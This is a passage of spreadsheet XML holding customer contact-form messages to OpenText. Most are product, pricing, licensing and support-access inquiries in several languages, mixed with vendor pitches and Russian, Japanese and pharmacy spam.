We would like to perform an assessment about the optimal WCM software to support our public websites._x000D_
One of the softwares we would like to assess is Opentext._x000D_
Would it be possible to get a product demo from you?_x000D_
Thanks a lot in advance._x000D_
Best regards,_x000D_
Laura</t>
  </si>
  <si>
    <t>Would like to get some information on the cloud fax solution.</t>
  </si>
  <si>
    <t xml:space="preserve">On behalf of Embassy of Republic of Indonesia would like to ask your email address and  mail address to send a book to all CEO Canadian Companies in Indonesia._x000D_
_x000D_
Thank you for your cooperation_x000D_
_x000D_
Warm Regards,_x000D_
_x000D_
Amalia_x000D_
</t>
  </si>
  <si>
    <t>I need to set up an account for Virginia.  We currently use GSX in a couple other states.  It says I need an invitation link.  Please help.</t>
  </si>
  <si>
    <t>Looking to update the current rightfax system to support office 365</t>
  </si>
  <si>
    <t>i am a new user. I have recieved the confirmation email, I clicked it and it said success. but I still cant access to downloads. I get the page that says I haven't confirmed the email.. which I have... any help appreciated.</t>
  </si>
  <si>
    <t>Need information for archiving of email, website and social media content.</t>
  </si>
  <si>
    <t xml:space="preserve">I need a list of features for Open Text's LiveLink emailed to me.  Prefer email rather than call  Thanks </t>
  </si>
  <si>
    <t>Hi Sir,_x000D_
I wish to know the price of a licence of Documentum and i also need to know about the assistance you give to customer to get it work.  I have one on my contact who need this product and he tel me to ask these informations</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in migrating our current RightFax contract, which is on-premise, to your cloud services and I have inquiries about pricing, licenses, and DIDs. </t>
  </si>
  <si>
    <t>Interested in learning more about your underwriting platform for a small underwriting company. Currently using an outdated in-house application and looking to see what options are out there.</t>
  </si>
  <si>
    <t>Is MediaBin able to interface with Epicor ERP?_x000D_
Please email with an answer. Do not call. Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Leah Myers and I work with Hearst service center. _x000D_
_x000D_
I am looking for a good person to contact regarding invoice/order maintenance. _x000D_
_x000D_
Could you direct me to the correct person?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Leah Myers</t>
  </si>
  <si>
    <t>Need to associate support contract to account.  Customer ID: V117822-000</t>
  </si>
  <si>
    <t>unable to download licence file</t>
  </si>
  <si>
    <t xml:space="preserve">request quote OpenText Exceed 15 </t>
  </si>
  <si>
    <t>My company has OpenText as an approved vendor for fax to email solutions.  I would like information on the Fax2Mail product and pricing through my company's arrangement.  Please contact me on my cell at 864-426-4638.</t>
  </si>
  <si>
    <t>I need to know the compatibilty of Documentum 7.2 with Windows 10 + 64 bits + Edge. Thanks in advance and best regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Open Text team,_x000D_
_x000D_
This is Sandeep from SIRC. We are a SBA certified hub zone company._x000D_
_x000D_
I’m writing to request pricing for the below Open text product description._x000D_
_x000D_
Line Items_x000D_
Mfr. Part/Item #	Manufacturer	Product/Service Name	Ship _x000D_
Address	Qty	Unit	Quote_x000D_
Unit Price	Remove_x000D_
UBSROII / 003600620	Actuate	Actuate VPE Application Web Server	(1)	1	NA	$	 _x000D_
UVNEUII / 003600621	Actuate	Actuate VPE Named End User	(1)	50	NA	$	 _x000D_
UVROUII / 003600618	Actuate	Actuate VEE Read Only User Software	(1)	30	NA	$	 _x000D_
UBSROII / 003600619	Actuate	Actuate BIRT Scorecard Read Only softwar	(1)	40	NA	$	 _x000D_
_x000D_
Period of performance: 07/29/2018 through 07/28/2019_x000D_
_x000D_
Contact: GLENDA BROOKS; Department of the Army_x000D_
</t>
  </si>
  <si>
    <t>I worked for Gupta/Centura in the UK in 1994 I bought shares and I found them in a box whilst moving! I am trying to find out if they are worth anything. Please can you put me in touch with anyone who could deal with this for me please. Thank you Suzanne</t>
  </si>
  <si>
    <t>Estimados, _x000D_
Estaríamos necesitando por favor que nos remitan costos acerca de las licencias BRAVA para aplicaciones en .NET. Los documentos a los cuales accedemos en las aplicaciones .NET están ubicados en DOCUMENTUM. _x000D_
Desde ya, muchas gracias._x000D_
Saludos</t>
  </si>
  <si>
    <t>Dear,_x000D_
I want to implement documentum 7 to our customer. But he already have it on his sever since 2014. Then, i want to reactivate a license. What are a cost of license for 1 server and around 100 users ? They talked me that the old one was annually. Thanks for your responce.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
In order to design a solution for a Customer, I need to have access to a compatibility matrix between OpenText VIM and SAP ECC._x000D_
Is it possible to send me this information?_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Tiago</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Ladies and Gentlemen._x000D_
_x000D_
we have several OFTP / EDI connections to LEAR over your service._x000D_
_x000D_
We are still call through ISDN to the SSID: O0031330GXS33145595MSEMEA._x000D_
Our ID is: O0013008671MERSCHB_x000D_
I would like to switch to TCP / IP._x000D_
_x000D_
Can you help me?_x000D_
_x000D_
_x000D_
==========================================_x000D_
_x000D_
_x000D_
Sehr geehrte Damen und Herren._x000D_
_x000D_
wir haben mehrere OFTP / EDI Verbindungen zu LEAR über Ihren Dienst. _x000D_
_x000D_
Wir sprechen hier noch über ISDN Die SSID: O0031330GXS33145595MSEMEA an._x000D_
Unsere ID lautet: O0013008671MERSCHB_x000D_
Gerne würde ich auf TCP/IP umstellen._x000D_
_x000D_
Können Sie mir hier weiterhelfen?_x000D_
_x000D_
Vielen Dank!_x000D_
</t>
  </si>
  <si>
    <t>i have an inquiry for Open Text renewal . could you please contact me ASAP._x000D_
Thanks</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Après une étude de vos campagne Adwords , nous constatons qu’il y a des mots clés très intéressants sur lesquels vous n’êtes pas positionnés sur Google._x000D_
_x000D_
Nous sommes sous-traitants pour les agences web européennes et canadiennes, par conséquent nous connaissons les meilleures méthodes d’optimisation d’Adwords._x000D_
_x000D_
Dans votre cas la gestion, « des options de correspondance des mots clés » et « Les mots clés négatifs » ne sont pas optimisés à 100%, ce qui engendre un coût d’acquisition bien plus élevé._x000D_
_x000D_
Dans les années 2005-2013, Adwords était plus simple à gérer car il y a avait moins de concurrents, donc des campagnes rentables plus facilement. Maintenant  Adwords est un outil plus puissant qui exige une parfaite maîtrise et  une gestion quotidienne pour le réglage des paramètres._x000D_
_x000D_
Notre agence est spécialisée dans le référencement Adwords ultra concurrentiel._x000D_
_x000D_
Dans 95% des cas, nos clients réduisent de 30% les coûts adwords_x000D_
_x000D_
Nous proposons des frais de gestion 2 à 3 fois moins cher que les agences françaises et sans frais de set-up. _x000D_
_x000D_
N’hésitez pas à nous contacter, nous saurons vous satisfaire._x000D_
_x000D_
_x000D_
_x000D_
  Bien cordialement_x000D_
  Cristel Durand_x000D_
  Marketing Wholesaler Website_x000D_
  ID SKYPE: W2CONTACT_x000D_
  Paris, France / Téléphone: +331 78 90 06 06_x000D_
  Antananarivo, MADAGASCAR / Téléphone: +261 3402 54437_x000D_
  www.wholesaler-website.com_x000D_
  Lot IPA 14 bis Ambohidahy Itaosy_x000D_
  cristel@wholesaler-website.com</t>
  </si>
  <si>
    <t>I would like to send request for information (RFI) related to your product</t>
  </si>
  <si>
    <t>Our customer need to send the Electronic Catalog to Nordstrom USA._x000D_
I need a contact to define cost and tecnical procedure._x000D_
_x000D_
My spoken English is poor, I would prefer an email contact.</t>
  </si>
  <si>
    <t xml:space="preserve">want to buy open text </t>
  </si>
  <si>
    <t>Hi, there do you have any dates for Melbourne on the innovation tour?</t>
  </si>
  <si>
    <t>My Registration in den "MySupport" area doesn't work, also I get several confirmation mails, where I click the confirmation link._x000D_
What's the problem?</t>
  </si>
  <si>
    <t>DAM solution for broadcasters</t>
  </si>
  <si>
    <t>Need to evaluate DMS, that can store and retrieve scanned and indexed paper documents, in-application documents (SAP, People Soft Campus Management System, SAKAI (LMS) etc.</t>
  </si>
  <si>
    <t xml:space="preserve">canadianpharmaciesbnt.com _x000D_
online prescription drugs_x000D_
</t>
  </si>
  <si>
    <t>Interested to partner for the OPENTEXT Product/ We have a current opportunity which needs an archiving solution.</t>
  </si>
  <si>
    <t xml:space="preserve">With 2018 upon us, I want you to feel certain that InComm Conferencing can step in and handle all of the needs of your IR department.  Our IR conferencing expertise has us running the quarterly conferences for clients such as Microsoft, Johnson &amp; Johnson, Walmart and Amazon just to name a few.  As a company that has consistently scored at the top of the conferencing vendor list in Rivel Research studies, InComm is poised to handle each of these key components for you in 2018:_x000D_
_x000D_
•	IR conference call and webcast_x000D_
•	Pre-recorded presentation media expertise_x000D_
•	Analyst and Investor Day events_x000D_
•	IR website design and hosting_x000D_
•	Newswire service with complete North American press release distribution_x000D_
_x000D_
If learning more about some or all of these service options are of interest, please let me know.  I can assure you that InComm’s stellar track record in the world of IR conferencing has developed due to our strong attention to detail.  Quality results for our clients have always followed.  I hope to have the opportunity to prove that to you in 2018!_x000D_
_x000D_
We managed Analyst Days for Jefferies &amp; Company, Leidos, CBRE, MacQuarie, QEP, AJ Gallagher, Columbus McKinnon, Devry Education, Plug Power, and many others._x000D_
_x000D_
Regards -_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Debra Maher_x000D_
InComm Conferencing_x000D_
National Account Executive_x000D_
208 Harristown Road_x000D_
Glen Rock, NJ 07452_x000D_
877-804-2062x4077_x000D_
201-493-6312_x000D_
Cell 201-647-6395_x000D_
www.incommconferencing.com_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Каждому хочется, что бы его жильё соответствовало всем желаемым требованиям, было комфортным, уютным, стильным и функциональным. При приобретении жилья в новостройке или строительстве частного дома можно сделать ремонт своей мечты с самого начала, а вот вместе с квартирой со вторичного рынка часто достаётся ремонт от предыдущих хозяев, подробнее читайте на сайте [url=http://blitz-remont.ru]blitz-remont.ru[/url]</t>
  </si>
  <si>
    <t>Interested in Rightfax appliance solution - urgent need. Would like to discuss options.</t>
  </si>
  <si>
    <t>Полиция возбудила дело против пассажира бизнес-класса, который устроил дебош на борту самолета, летевшего из Москвы в Нью-Йорк, сообщила официальный представитель МВД Ирина Волк, передает РИА Новости. Читайте об этом подробнее на сайте [url=http://s-narodom.ru]s-narodom.ru[/url]</t>
  </si>
  <si>
    <t>Enquiring on price of the Open Text document management system for a small business (currently 8 users)</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently gathering requirements and discovering what it will take to replace our current content management product (IBM Content Manager). _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I'd like to request a new electronic license for my team. We have recently setup a new server and we're delpoying EnCase Forensic v8 on the new machine. _x000D_
_x000D_
Please send me the license key number so that I am able to activate the license. _x000D_
_x000D_
Regards,_x000D_
_x000D_
Orlando Bryant_x000D_
Senior Incident Response_x000D_
NTT Security (US)_x000D_
Solutionary </t>
  </si>
  <si>
    <t>Epic integration</t>
  </si>
  <si>
    <t>Hello,_x000D_
Our client Echecopar in Lima Perú have OpenText like internal services ECM, so we have software for Printer Multifunction called GlobalScanNX and need integrated with OpenText, we create a virtual machine with GlobalScanNX and need a trial OpenText sample for try connections and deliver scan files directly._x000D_
_x000D_
Thanks for your help_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I need my own login and password access to the vendor account information below._x000D_
Vendor # 829810101_x000D_
GLN # 0898628002007_x000D_
Can you get get me my own credentials for Vendor chargeback investigations?_x000D_
Thanks,_x000D_
-Patrick Irvine_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are looking for a Fax solution to replace our aging machines. We are currently running on Fiber with a SIP trunk for our VoIP phones. What would be the best solution for us as far as fax goes?</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
My name is Frank Ritz and I am a District Manager with AAA Northeast. Our company books travel for our members as a broker. We make the booking online through the vendor then manually type the required information into our accounting system for tracking (internally created system). I was exploring companies that could help us automate this process. We were hoping to purchase or have built software that could interpret the required information from these vendor invoices and input it into the fielsd of our accounting system. We use 20 different vendors that call these information slightly different terms so this has been a challenge finding software that could completely automate the process. Please let me know if you think your company could help us with our software needs. Thanks!_x000D_
</t>
  </si>
  <si>
    <t>licence file</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I saw that I am getting emails from your servers and wanted to know more about solutions and how to have OpenText Notifications solution for myself as well._x000D_
I can't find the pricing, I am just a small time internet marketer, but I do have clients that send quite a lot of emails (100K a week, maybe not a lot for you) _x000D_
So where can I find more about costs of your products?</t>
  </si>
  <si>
    <t>Hi,_x000D_
Wondering how can I get access to the OpenText forum. This is really useful to some of my tech leads. They had access when was Dell owned but now they lack access to such forum._x000D_
_x000D_
We as partners shall have access right?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
I am part of Data &amp; Analytics portfolio of Presbyterian Healthcare Services. We are leveraging  Actuate Corp product in our organization for PresTrack (Scorecards). I would like to invite you to work on a proposal and SOW to assess our current scorecards and advise on the gap between what we have and what is the gap to achieve our organizational objectives. _x000D_
I am unable to find Actuate contact info in our system hence I am sending this request._x000D_
_x000D_
Thanks,_x000D_
Ali Shaik</t>
  </si>
  <si>
    <t>Hello, I would like to schedule a demonstration of you "Media Manager" product.  This will be replacing our current solution of MeidaBin 8.1.</t>
  </si>
  <si>
    <t xml:space="preserve">training on how rightfax works </t>
  </si>
  <si>
    <t>We have maintenance on 25 licenses of Exceed - I would like the newest download - here is the VPS Number: V031827-000</t>
  </si>
  <si>
    <t xml:space="preserve">Need a secure fax solution for my small business.  Want it to work seamlessly with all Office365 applications whether we're using them on-line or installed on our desktops.  </t>
  </si>
  <si>
    <t>Trying to activate license and cannot get to the correct page to do so _x000D_
_x000D_
Obtaining your License File:_x000D_
Please visit: support.opentext.com and follow the below steps_x000D_
o              Click on Accounts on the Top Menu_x000D_
o              Select Activations/Keys_x000D_
o              On the Product Activation Page Search for your IGC PIN_x000D_
o              Click on the Produce License Key icon_x000D_
o              Enter Required information to generate Key_x000D_
o              Click Submit_x000D_
o              Click Download File to obtain your License File_x000D_
o              Open zip file and save IGCKey.lic to a retrievable location  (i.e. Desktop).</t>
  </si>
  <si>
    <t xml:space="preserve">canadianpharmaciesbnt.com _x000D_
prescription drug assistance_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Согласно медицинской статистике, каждый восьмой россиянин страдает от проблем с суставами (артроза, радикулита, артрита). Эти заболевания сопровождаются стойкими болями, которые отравляют жизнь пациентов и мешают им полноценно жить и работать. Постоянное использование сильнодействующих анальгетиков нежелательно, так как их применение крайне негативно влияет на состояние ЖКТ и всего организма в целом. Как быть в такой ситуации? Существуют ли безопасные средства, способные справиться с изматывающей болью? Специалисты с уверенностью заявляют о том, что спасением для таких больных станет новый препарат — крем Артропант от боли в суставах. _x000D_
 _x000D_
Официальные сайты: _x000D_
[url=http://art.m16-poten.ru/kak-deystvuet/krem-artropant-kupity-v-apteke-cena-v-belgorode.html]Крем артропант купить в аптеке цена в белгороде[/url]_x000D_
[url=http://art.m16-poten.ru/kak-prinimaty/mazy-artropant-kupity-v-moskve-v-apteke.html]Мазь артропант купить в москве в аптеке[/url]_x000D_
[url=http://art.m16-poten.ru/kak-prinimaty/krem-artropant-cena-i-instrukciya.html]Крем артропант цена и инструкция[/url]_x000D_
[url=http://art.m16-poten.ru/sostav/artropant-cena-v-moskve-v-apteke.html]Артропант цена в москве в аптеке[/url]_x000D_
[url=http://art.m16-poten.ru/kak-prinimaty/sredstvo-dlya-lecheniya-sustavov-artropant.html]Средство для лечения суставов артропант[/url]_x000D_
</t>
  </si>
  <si>
    <t>[url=http://www.socialvoice.club/lead-magnet3fpnduch][img]https://c.radikal.ru/c30/1801/73/bc6f49a1cb2d.jpg[/img][/url] _x000D_
 _x000D_
[url=http://www.socialvoice.club/lead-magnet3fpnduch]Get 63% OFF! MOST comfortable bike seat! _x000D_
FASHION and streamlined bicycle saddle design. Fancy bicycle seats for women comfort riding[/url]</t>
  </si>
  <si>
    <t>I need a way to get actual invoice copies! and I need to know when invoices are due!</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are everis consultant. I cannot access to the Knowledge center to consult the oficial guides, notes..._x000D_
_x000D_
Please could you fix the problema to get Access?._x000D_
_x000D_
Kind Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
We are in the process of reviewing our Digital Asset Management landscape and your product is a part of this review, before we arrange any in-depth product demonstrations with IS and key users within the organisation we would like to have a clear idea of the technical side. Could I please ask that you provide some more detail on the below areas. _x000D_
_x000D_
•	Application Architecture             _x000D_
o	Cloud / Hybrid / On Prem_x000D_
o	Implementation planning and approach_x000D_
o	If cloud…Security Concerns for Intellectual Property in the Cloud_x000D_
o	Disaster Recovery_x000D_
o	Audit Capability_x000D_
o	GDPR coverage/Data protection_x000D_
o	Location of storage_x000D_
•	Integration Points          _x000D_
o	APIs_x000D_
o	Rest Services_x000D_
o	Web Services_x000D_
o	Adobe Services_x000D_
o	Office 365_x000D_
•	Scalability          _x000D_
o	What will the cost be as usage grows? _x000D_
o	Infrastructure increase in capacity / storage / performance_x000D_
o	Performance &amp; Location_x000D_
•	Security Identity Management/Authentication_x000D_
o	Communication of breaches_x000D_
o	Certification rating iso etc_x000D_
o	Control mechanisms_x000D_
o	SOC audit_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for support on Teleform Verifier.</t>
  </si>
  <si>
    <t>Looking to test drive OpenText as we are looking to replace on many on-prem fax machines/MFC devices across multiple offices with a Cloud Fax solution. Do you offer trial accounts?_x000D_
_x000D_
Also, please use email as the primary contact method if possible.</t>
  </si>
  <si>
    <t>Hi, I registered for the conference and would like to book/pay for two classes there at conference. How can I do this? Thanks!</t>
  </si>
  <si>
    <t>As our company grows, I would like to learn more about OpenText/Documentum and the services that it provides.  Many of our employees have used this product at other companies, and I would like to know more about how it differs from other products.  Thanks, John</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We have the new ‘Healthcare IT Professionals’ Email List with complete contact information such as Company Name, Website, Contact Name, First Name, Last Name, Email Address, Title, Address, City, State, Zip Code, Phone, Fax Number, Website, Industry, SIC code etc.,_x000D_
_x000D_
I just wanted to check if you would be interested in purchasing ‘Healthcare IT Professionals’ list to reach your target audience and expand your market reach in 2018._x000D_
_x000D_
Note: If Healthcare IT is not relevant to you please reply back with your requirement, we have all type of lists that would meet your quality prospecting- _x000D_
_x000D_
Target Industry:  ______?_______; Geography:  _______?_______; Job Title (Any):  ________?_________:_x000D_
_x000D_
Look forward to hearing from you._x000D_
</t>
  </si>
  <si>
    <t>We need to renew Open Text contract for year 2018 and would like try Open Text Exceed Ondemand on Linux Red Hat 7 to determine performance. The qoute for renewal is SUS08450981.</t>
  </si>
  <si>
    <t>I am an employee of everis (technology consultant company) and we are currently implementing a VIM Opentext project to the very important client BANK SABADELL - TSB._x000D_
We require inmmediate attention for Opentext VIM issues because we are in GO-LIVE stage and I cannot access to full support information. _x000D_
Please provide help as soon as possible.</t>
  </si>
  <si>
    <t>We want to know about OpenText xECM for SuccessFactors in order to evaluate implementing it. We already use most SuccessFactors's modules.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
	We are looking to pick up a dedicated server with a /27 or greater._x000D_
It's for email purposes. We are a clean, scan-spam compliant with no issues.  _x000D_
	Also, if you have any email records or IP addresses for sale_x000D_
we would have an interest in that as well. _x000D_
</t>
  </si>
  <si>
    <t>I wanted to know the version of the Free DWG Viewer compatible with windows 10, 64 bit machines and where can I download it?</t>
  </si>
  <si>
    <t>Hello, your company owns the domain www.easylink.com. Is it possible to buy this domain?_x000D_
Best regards, Rutger Lokhorst - improvit</t>
  </si>
  <si>
    <t>Vorstellung als Reseller - Zusammenarbeit bei einem gemeinsamen Großkunden_x000D_
_x000D_
_x000D_
Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich melde mich bei Ihnen bezüglich einer Kundenanfrage - dieser Großkunde sieht für die Zukunft vor, uns als "Stammlieferant" für sämtliche Software-Anfragen vorzuziehen._x000D_
Hierzu haben wir eine Excel-Liste erhalten mit sämtlichen Software-Herstellern - in dieser Liste kamen auch Sie vor. _x000D_
_x000D_
Um welchen Kunden es sich handelt darf ich (vorerst) nicht verraten aufgrund einer Geheimhaltungsvereinbarung. _x000D_
_x000D_
Wir sind ein mittelständisches Unternehmen aus Sindelfingen (nähe Stuttgart) und beschäftigen uns seit 1988 mit der Beschaffung und Lizenzierung von _x000D_
Standard Business Software. Unser Portfolio umfasst sämtliche namhafte Hersteller, siehe unseren Webauftritt: www.software-express.de_x000D_
_x000D_
Arbeiten Sie mit Resellern zusammen bzw. würden uns dann - bei unserem wahrscheinlich zukünftigen gemeinsamen Großkunden - mit Rabatten unterstützen,_x000D_
oder arbeiten Sie lediglich nur im Direktvertrieb mit Ihren Kunden?_x000D_
_x000D_
Vielen Dank im Voraus für Ihre Hilfe - ich freue mich auf Ihre baldige Rückmeldung._x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Koray Yaman</t>
  </si>
  <si>
    <t>I would like a quote ASAP for 70 user licenses for ApplicationXtender.  We have a client that is  currently using our solution and would like us to integrate with applicationxtender where we host the total solution including applicationxtender.  we are on a very tight timeline and need a quote today if possible._x000D_
thank you_x000D_
Janet</t>
  </si>
  <si>
    <t>Webinar verpasst what´s new in xecm for Engineering. Kann ich da ein link für die Aufzeichnung bekommen ? Für eine schnelle Antwort wäre ich ihnen dankbar.</t>
  </si>
  <si>
    <t>Geachte heer/mevrouw,_x000D_
Wij, de Universiteit Utrecht ontving onderstaande Administration Guide:_x000D_
OpenText™ Vendor Invoice Management for SAP® Solutions Administration Guide_x000D_
This guide describes the technical and functional aspects of administering OpenText Vendor Invoice Management._x000D_
VIM070500-05-AGD-EN-2_x000D_
Is er ook een Nederlandse versie hiervan? Graag zouden wij deze ontvangen op bovenstaand emailadres of website._x000D_
Met vriendelijke groeten,_x000D_
Dorothy Veldema_x000D_
Functioneel beheerder SAP, afdeling UU/ITS</t>
  </si>
  <si>
    <t>Our company has been sold licence keys for exceed and exceed 3D, however, I or Manil cannot access the software or create support tickets.  _x000D_
 - Manil has confirmed email address, but vcarious sections of website are still requesting confromation_x000D_
 - Have used the new and old portals to download software, but I cannot. The error from teh website in both cases is ERR_TOO_MANY_REDIRECTS.  I have cleared cookies._x000D_
 - I don't have assess to the support portal._x000D_
_x000D_
Please can you let us know how to proceed?_x000D_
_x000D_
Thanks,_x000D_
Sean</t>
  </si>
  <si>
    <t>New version of Exstream licence</t>
  </si>
  <si>
    <t>Стоматология в кредит. Центр биотической стоматологии, Официальный сайт, Детская стоматология, Гнатология, Помощь на дому [url=http://dentaljazz.ru/services/detskaya-stomatologiya/]лучшая детская стоматология в москве[/url] Запись на прием к врачу стоматологу. Цены, телефон и адрес круглосуточной стоматологии в Москве. Лечение, пломбирование и отбеливание зубов для детей и всей семьи. Стоматология</t>
  </si>
  <si>
    <t>I need to transfer my admin rights to my colleague. Please let me know what is the process and how do we do it ASAP</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
je souhaite permettre à mes clients d'uploader leurs justificatifs (d'identité, de revenus, de domicile) dans le tunnel de commande. Exactement comme peuvent le proposer les banques en ligne lors de l'ouverture d'un compte._x000D_
_x000D_
Je cherche donc une solution permettant :_x000D_
- de créer un dossier réceptacle par client_x000D_
- de sécuriser le transfert et le stockage des pièces_x000D_
- de pouvoir atteindre ces dossiers via des liens _x000D_
- de restreindre les droits d'édition/ de lecture par utilisateurs_x000D_
- de planifier la purge_x000D_
_x000D_
Nous n'avons pas besoin de créer de document automatiquement ou de gestion de workflow complexe._x000D_
_x000D_
Votre solution répond-t-elle à ce besoin ?_x000D_
_x000D_
Baptiste Boucher</t>
  </si>
  <si>
    <t>Please could you change the address on our Account to:-_x000D_
Anstee &amp; Ware Group Ltd_x000D_
Bondsmill Estate_x000D_
Bristol Road_x000D_
Stonehouse_x000D_
Glos GL10 3RF_x000D_
_x000D_
Please could you then resend the renewal to  me for Payment</t>
  </si>
  <si>
    <t>Interesse für DMS Software</t>
  </si>
  <si>
    <t>Not able to access My support</t>
  </si>
  <si>
    <t>Webinar verpasst what´s new in xecm for Engineering. Kann man mir die Aufzeichnung bitte davon zukommen lassen?</t>
  </si>
  <si>
    <t xml:space="preserve">searching for archive solution integrated with netapp </t>
  </si>
  <si>
    <t>Hello Sir/Madam_x000D_
 _x000D_
 I want to promote my website https://xtbtrade.com in London, Bristol, Birmingham, Mancheaster, Glasgow, Lovepool, Leeds etc. Can you please give me estimate time and quote for completion. I have 10 keyworkds in my mind. _x000D_
_x000D_
Looking forward to working with you soon._x000D_
_x000D_
Regards, _x000D_
XTB Team\</t>
  </si>
  <si>
    <t>Je ne parviens plus à me connecter à My Support. Pouvez vous m'aider?_x000D_
Merci de me recontacter en français...</t>
  </si>
  <si>
    <t xml:space="preserve">canadianpharmaciesbnt.com _x000D_
canadian online pharmacies_x000D_
</t>
  </si>
  <si>
    <t>Looking for a bootp utility compatible with Windows 7 and 10.</t>
  </si>
  <si>
    <t>Submitted the resume..Can you please go through it and revert me.</t>
  </si>
  <si>
    <t>Quote for Rightfax</t>
  </si>
  <si>
    <t>We belong to part of chennai  and required the complete link for Documentum consultant certification  wherein we could register individual and pay for the certification in INR, _x000D_
_x000D_
Kindly revert at earliest.</t>
  </si>
  <si>
    <t>Hello. I submitted a Desktop Products License Change Request around this time last week and received the acknowledgement stating that I'd be contacted within one business day, but haven't yet heard from you. Can you please follow up on this. Thanks, Chris.</t>
  </si>
  <si>
    <t>We need the renewal quotation for Bank DBS Indonesia</t>
  </si>
  <si>
    <t>◇◆◇◆◇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
　　　　　人材不足解消　　　　　人材コスト削減_x000D_
──────────────────────────────────────────────_x000D_
☆パート人材はまだまだ豊富な市場！_x000D_
・働き方改革により主婦層の活用が注目されています。_x000D_
☆業務を見直せば効率の良い時間だけ配属！_x000D_
・1日8時間、週5日じゃないとダメでしょうか？_x000D_
☆１人分の業務をワークシェアで稼動させれば、お休みや退職時のリスクを軽減できます。_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇◆◇◆◇_x000D_
_x000D_
突然のメール失礼致します。_x000D_
このたびは貴社のホームページを拝見してご連絡させて頂きました。_x000D_
株式会社キャリアシステムと申します。_x000D_
_x000D_
弊社は、東京・名古屋・大阪で、パートタイム型／ワークシェア型派遣に特化した人材派遣会社です。_x000D_
_x000D_
本日は、今すぐ働ける人材として、下記に「HOT人材情報」を提案いたします。_x000D_
興味ある人材でしたら、是非一度ご連絡下さい。_x000D_
_x000D_
今回のHOT人材 ＜1＞-----------------------------------------------_x000D_
【イニシャル】MYさん（ID：12661）_x000D_
【職種】総務・人事_x000D_
【経験年数】9年_x000D_
【経歴値】社会保険業務や年末調整、労災や住民税、勤怠管理等の経験や_x000D_
法務部内でも株主総会準備や支払処理（SAP）、各種審査書類の作成など_x000D_
総務・管理部門内での経験を持つ。_x000D_
【ポイント】コミュニケーション能力や柔軟性に信頼のおける人物_x000D_
【就業形態】週2～3日　9：00～17：00　1日7時間_x000D_
【月額例】161,000円（2,300円／時×7時間×月10日での勤務時）_x000D_
※通勤交通費は別で御請求いたします。_x000D_
----------------------------------------------------------------------------------------_x000D_
今回のHOT人材＜2＞-----------------------------------------------_x000D_
【イニシャル】KNさん（ID：18986）_x000D_
【職種】ヘルプデスク・ITサポート_x000D_
【経験年数】18年_x000D_
【経歴値】ITサポート（プリンタ設定・PCキッティング・Officeサポート・障害切り分け等）や_x000D_
総合商社ヘルプデスクとして電話一次対応、オンサイト対応及びセキュリティ報告_x000D_
他、webページ制作・記事作成（ホームページビルダー・HTML）などにも従事。_x000D_
【ポイント】社内ITサポートとしての実務経験が豊富_x000D_
【就業形態】週4日　9：00～18：00　1日8時間_x000D_
【月額例】358,400円（2,800円／時×8時間×月16日での勤務時）_x000D_
※通勤交通費は別で御請求いたします。_x000D_
-------------------------------------------------------------------------_x000D_
_x000D_
上記以外にも毎日パート人材が登録にお越しいただいてます。_x000D_
経験職種や取得されている資格などは多岐にわたります。_x000D_
_x000D_
その中でも、弊社が特化し強みとしているのが下記の職種となります。_x000D_
◆Web人材（デザイナー、ディレクター、コーダー、HP更新、DTP等）_x000D_
◆ITエンジニア（SE・PG、テスト工程、アシスタント等）_x000D_
◆事務系職種（営業事務、経理事務、総務事務、受付事務、医療事務等）_x000D_
◆サポート系職種（カスタマサービス、テレマ、CAD事務、営業アシスタント等）_x000D_
_x000D_
実際にパートタイム派遣をご活用頂いている_x000D_
企業様をご紹介しております。是非、こちらもご覧下さい！_x000D_
https://www.parthaken.jp/employer/_x000D_
_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
株式会社キャリアシステム 　東京支店_x000D_
担当：横山、佐藤_x000D_
cs-contact@919.jp_x000D_
_x000D_
〒107-0052 東京都港区赤坂2-11-7 ATT新館_x000D_
TEL：03-5574-7333_x000D_
フリーコール：0120-505-169_x000D_
_x000D_
キャリアシステム_パート派遣HP_x000D_
https://www.parthaken.com/_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</t>
  </si>
  <si>
    <t>Hi Team._x000D_
_x000D_
I am not able to log technical support ticket. Could you grant me access please? Thanks_x000D_
_x000D_
Thanks,_x000D_
Kevin</t>
  </si>
  <si>
    <t>Issue with downloading Brava</t>
  </si>
  <si>
    <t>Стоматологический центр в москве. На страничке только реальные отзывы о стоматологах, написанные реальными людьми, что легко проверить. Хорошая стоматология отзывы не выдумывает, а заслуживает [url=http://dentaljazz.ru/implantaciya-zubov-vidy-implantatov/]зубные имплантаты[/url] Домодедовская городская стоматологическая поликлиника</t>
